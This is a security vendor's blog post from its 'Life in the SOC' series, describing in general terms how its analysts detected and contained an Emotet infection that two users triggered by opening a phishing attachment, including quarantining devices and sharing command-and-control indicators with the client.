Emotet: What Happens When Users Open the Attachment

“Life in the SOC” is a Blog Series that shares experiences of the BlueVoyant SOC defending against the current and prevalent attacks encountered by our clients. The blogs discuss successful detection, response and mitigation actions that can improve your defensive capabilities.

Emotet is one of the most prolific variants of malware today. In Q1 2019 it accounted for over 40% of all detections by the BlueVoyant SOC. Emotet is a banking trojan designed to steal account details. It steals FTP credentials. It also steals emails which it uses to disguise itself as legitimate communications that allow it to move laterally across the network.

Emotet has evolved in sophistication. In recent variants, we have seen it morph into a dropper to deliver other malware, ransomware and banking trojans (read Top 5 Cybercrimes and Prevention Tips for more information on these cyber crimes and others). It is polymorphic and evades signature-based detection by changing every time it is downloaded. It has the ability to detect when it’s in a Sandbox and will go dormant to avoid detection. Emotet is a very nimble malware that employs multiple techniques for lateral movement.

In a recent attack, 48 users received a phishing email with a malicious .doc (maldoc) attached. Despite internal security training, two users opened the attachment. This executed a VBA (Virtual Basic for Applications) script infecting the two devices. Our SOC analysts saw the users open the emails and execute the maldoc. The initial investigation revealed the maldoc was not a known malware identified on any threat intelligence sources. They determined it was malicious and immediately blacklisted it.

We also observed a PowerShell script, with suspicious command lines, kickoff on the infected devices. As a result, the SOC immediately quarantined the infected devices to prevent the attack from moving laterally through the network. The attack took place early in the morning. These actions were completed before the morning rush to work, preventing others from opening the malicious email.

As a follow-up, we provided the client with the Command and Control (C2) IP addresses found in the VBA script. Emotet retrieves payloads and installs updates from C2 servers. We also delivered indicators identified in the PowerShell script to help detect and prevent future attacks.